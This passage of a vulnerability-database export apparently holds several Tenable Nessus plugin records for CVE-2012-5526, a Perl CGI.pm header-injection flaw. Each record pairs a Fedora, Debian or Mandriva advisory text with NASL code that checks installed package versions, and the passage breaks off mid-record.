"bulletinFamily": "scanner", "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly) in CGI-3.52.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-28T00:00:00", "id": "FEDORA_2012-19282.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63248", "published": "2012-12-13T00:00:00", "title": "Fedora 17 : perl-5.14.3-218.fc17 / perl-CGI-3.52-218.fc17 (2012-19282)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-19282.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63248);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/28 22:47:44\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-19282\");\n\n script_name(english:\"Fedora 17 : perl-5.14.3-218.fc17 / perl-CGI-3.52-218.fc17 (2012-19282)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly) in CGI-3.52.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-December/094612.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c66abd01\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-December/094613.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b75eda3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl and / or perl-CGI packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"perl-5.14.3-218.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"perl-CGI-3.52-218.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl / perl-CGI\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:18:02", "bulletinFamily": "scanner", "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly) in CGI-3.59.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-28T00:00:00", "id": "FEDORA_2012-19125.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63235", "published": "2012-12-12T00:00:00", "title": "Fedora 18 : perl-5.16.2-235.fc18 / perl-CGI-3.59-235.fc18 (2012-19125)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-19125.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63235);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/28 22:47:44\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-19125\");\n\n script_name(english:\"Fedora 18 : perl-5.16.2-235.fc18 / perl-CGI-3.59-235.fc18 (2012-19125)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly) in CGI-3.59.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-December/094546.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d14d3da\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-December/094547.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?32eb71d9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl and / or perl-CGI packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"perl-5.16.2-235.fc18\")) flag++;\nif (rpm_check(release:\"FC18\", reference:\"perl-CGI-3.59-235.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl / perl-CGI\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:18:00", "bulletinFamily": "scanner", "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-28T00:00:00", "id": "FEDORA_2012-18318.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63081", "published": "2012-11-29T00:00:00", "title": "Fedora 17 : perl-CGI-3.51-7.fc17 (2012-18318)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18318.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63081);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/28 22:47:44\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-18318\");\n\n script_name(english:\"Fedora 17 : perl-CGI-3.51-7.fc17 (2012-18318)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/093398.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6672f854\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-CGI package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"perl-CGI-3.51-7.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-CGI\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:18:03", "bulletinFamily": "scanner", "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly) in CGI-3.52.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-28T00:00:00", "id": "FEDORA_2012-18330.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63282", "published": "2012-12-18T00:00:00", "title": "Fedora 16 : perl-5.14.3-203.fc16 / perl-CGI-3.52-203.fc16 (2012-18330)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18330.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63282);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/28 22:47:44\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-18330\");\n\n script_name(english:\"Fedora 16 : perl-5.14.3-203.fc16 / perl-CGI-3.52-203.fc16 (2012-18330)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly) in CGI-3.52.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-December/094761.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a22c8bdc\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-December/094762.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a007a810\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl and / or perl-CGI packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"perl-5.14.3-203.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"perl-CGI-3.52-203.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl / perl-CGI\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:18:03", "bulletinFamily": "scanner", "description": "It was discovered that the CGI module for Perl does not filter LF characters in the Set-Cookie and P3P headers, potentially allowing attackers to inject HTTP headers.", "modified": "2018-11-28T00:00:00", "id": "DEBIAN_DSA-2587.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63271", "published": "2012-12-17T00:00:00", "title": "Debian DSA-2587-1 : libcgi-pm-perl - HTTP header injection", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2587. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63271);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/28 22:47:42\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"DSA\", value:\"2587\");\n\n script_name(english:\"Debian DSA-2587-1 : libcgi-pm-perl - HTTP header injection\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the CGI module for Perl does not filter LF\ncharacters in the Set-Cookie and P3P headers, potentially allowing\nattackers to inject HTTP headers.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=693421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/libcgi-pm-perl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2587\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libcgi-pm-perl packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.49-1squeeze2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcgi-pm-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libcgi-pm-perl\", reference:\"3.49-1squeeze2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:18:03", "bulletinFamily": "scanner", "description": "A vulnerability was discovered and corrected in perl-CGI :\n\nCGI.pm module before 3.63 for Perl does not properly escape newlines in (1) Set-Cookie or (2) P3P headers, which might allow remote attackers to inject arbitrary headers into responses from applications that use CGI.pm (CVE-2012-5526).\n\nThe updated packages have been patched to correct this issue.", "modified": "2019-01-02T00:00:00", "id": "MANDRIVA_MDVSA-2012-180.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63284", "published": "2012-12-18T00:00:00", "title": "Mandriva Linux Security Advisory : perl-CGI (MDVSA-2012:180)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:180. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63284);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/01/02 16:37:54\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"MDVSA\", value:\"2012:180\");\n\n script_name(english:\"Mandriva Linux Security Advisory : perl-CGI (MDVSA-2012:180)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was discovered and corrected in perl-CGI :\n\nCGI.pm module before 3.63 for Perl does not properly escape newlines\nin (1) Set-Cookie or (2) P3P headers, which might allow remote\nattackers to inject arbitrary headers into responses from applications\nthat use CGI.pm (CVE-2012-5526).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-CGI and / or perl-CGI-Fast packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-CGI-Fast\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2011\", reference:\"perl-CGI-3.530.0-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"perl-CGI-Fast-3.530.0-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:18:03", "bulletinFamily": "scanner", "description": "Two vulnerabilities were discovered in the implementation of the Perl programming language :\n\n - CVE-2012-5195 The 'x' operator could cause the Perl interpreter to crash if very long strings were created.\n\n - CVE-2012-5526 The CGI module does not properly escape LF characters in the Set-Cookie and P3P headers.\n\nIn addition, this update adds a warning to the Storable documentation that this package is not suitable for deserializing untrusted data.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-2586.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63270", "published": "2012-12-17T00:00:00", "title": "Debian DSA-2586-1 : perl - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) 